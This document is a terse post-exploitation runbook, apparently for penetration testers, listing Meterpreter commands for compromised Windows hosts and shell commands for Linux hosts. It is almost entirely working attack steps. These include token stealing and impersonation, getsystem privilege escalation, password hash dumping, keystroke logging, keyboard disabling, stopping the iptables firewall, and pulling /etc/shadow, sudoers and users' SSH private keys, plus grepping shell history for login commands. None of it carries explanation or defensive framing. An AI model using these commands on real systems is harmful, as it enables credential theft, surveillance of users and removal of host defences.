Meterpreter Post-Auth Runbook
Meterpreter post-exploitation modules
  > use post/windows/gather/enum_logged_on_users
Railgun - Meterpreter extension that allows direct access to Windows APIs
IRB - Ruby shell inside Meterpreter
Meterpreter Post Auth
Info gathering
  getuid
  getpid
  getprivs
  sysinfo
  screenshot
  run winenum
  run scraper
  run checkvm
  run credcollect
  run get_local_subnets
Priv esc
  ps, then migrate
  getsystem
Tokens
  list_tokens -u
  impersonate_token
  steal_token [pid]
  rev2self
Retrieve passwords
  hashdump
  cachedump
  post/windows/gather/smart_hashdump
  post/windows/gather/credentials/vnc
Session
  enumdesktops
  getdesktop
  setdesktop
  uictl disable keyboard
Keylog
  keyscan_start
  keyscan_dump
  keyscan_stop
Nix Post Auth
Disable firewall
  /etc/init.d/iptables save
  /etc/init.d/iptables stop
  iptables-save > /root/firewall.rules
  iptables-restore < /root/firewall.rules
Files to pull
  /etc/passwd
  /etc/shadow OR /etc/security/shadow
  /etc/group OR /etc/gshadow
  /home/*/.ssh/id*
  /etc/sudoers
User information
  grep ^ssh /home/*/.*hist*
  grep ^telnet /home/*/.*hist*
  grep ^mysql /home/*/.*hist*